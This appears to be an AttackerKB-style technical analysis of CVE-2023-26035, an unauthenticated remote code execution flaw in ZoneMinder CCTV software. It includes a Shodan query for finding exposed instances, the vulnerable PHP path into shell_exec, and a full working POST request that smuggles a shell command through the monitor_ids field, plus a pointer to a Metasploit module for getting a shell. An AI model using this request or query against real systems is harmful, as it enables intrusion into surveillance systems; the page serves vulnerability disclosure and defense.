High
CVE-2023-26035
CVE-2023-26035
Description
ZoneMinder is a free, open source Closed-circuit television software application for Linux which supports IP, USB and Analog cameras. Versions prior to 1.36.33 and 1.37.33 are vulnerable to Unauthenticated Remote Code Execution via Missing Authorization. There are no permissions check on the snapshot action, which expects an id to fetch an existing monitor but can be passed an object to create a new one instead. TriggerOn ends up calling shell_exec using the supplied Id. This issue is fixed in This issue is fixed in versions 1.36.33 and 1.37.33.
Add Assessment
Technical Analysis
ZoneMinder is a free, open source Closed-circuit television software application. At the time of writing there appears to be just over 3200 identifiable instances listening on the internet according to the following crude Shodan query:
shodan count "http.html:\"<title>ZM - Login</title>\" http.html:\"/zm/\"" 3237
ZoneMinder prior to the versions listed below suffer from an unauthenticated remote code execution vulnerability in default configuration. The vulnerability is trivial to execute and provides a valuable entry point for attackers.
Vulnerable Versions
Prior to 1.36.33
Prior to 1.37.33
How it works
By default on affected versions unauthenticated users can access the create snapshot action when accessing the following endpoint /zm/index.php. The following is an excerpt from snapshot.php
if ( $action == 'create' ) { if ( ! (isset($_REQUEST['monitor_ids']) and count($_REQUEST['monitor_ids']) > 0 ) ) { ZM\Error('No monitor ids given in snapshot creation request'); return; } $snapshot = new ZM\Snapshot();
The snapshot action expects a monitor_id in order to fetch an existing monitor, however you can pass an object in order to create a new monitor instead (we will actually pass in a malicious payload here). Soon after the method TriggerOn(); is called in order to retrieve an event_id:
$event_id = $monitor->TriggerOn(); ZM\Debug("Have event $event_id for monitor $monitor_id");
TriggerOn() immediately calls the function AlarmCommand($cmd):
function TriggerOn() { $output = $this->AlarmCommand('on');
Inside AlarmCommand a call to shell_exec is made and it appends the monitor_id we sent earlier without applying any sanitization to the parameter:
$cmd = getZmuCommand($cmd.' -m '.validCardinal($this->{'Id'})); $output = shell_exec($cmd);
Exploiting the vuln.
Note that in order to exploit this vulnerability you have to first grab a csrf-token from the response body of a request to /zm/index.php:
<div class="container"> <form class="center-block" name="loginForm" id="loginForm" method="post" action="?view=login"><input type='hidden' name='__csrf_magic' value="key:1b3da97bd640e57e0ce5dc6f5a09e7a1a9368004,1699900789" /> <input type="hidden" name="action" value="login"/> <input type="hidden" name="postLoginQuery" value="" />
In the above example the token is 1b3da97bd640e57e0ce5dc6f5a09e7a1a9368004,1699900789. With that information you can then send the following post request to a vulnerable target in order to write a file to the temp directory:
POST /zm/index.php HTTP/1.1 Host: 192.168.65.2 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Content-Type: application/x-www-form-urlencoded Content-Length: 268 view=snapshot&action=create&monitor_ids[0][Id]=;touch%20/tmp/pwnd&__csrf_magic=key:1b3da97bd640e57e0ce5dc6f5a09e7a1a9368004,1699900789
If you want to shell, edit the post request or use the metasploit module: unix/webapp/zoneminder_snapshots
References
https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr
CVSS V3 Severity and Metrics
General Information
Vendors
- zoneminder
Products
- zoneminder
Metasploit Modules
References
Exploit
A PoC added here by the AKB Worker must have at least 2 GitHub stars.
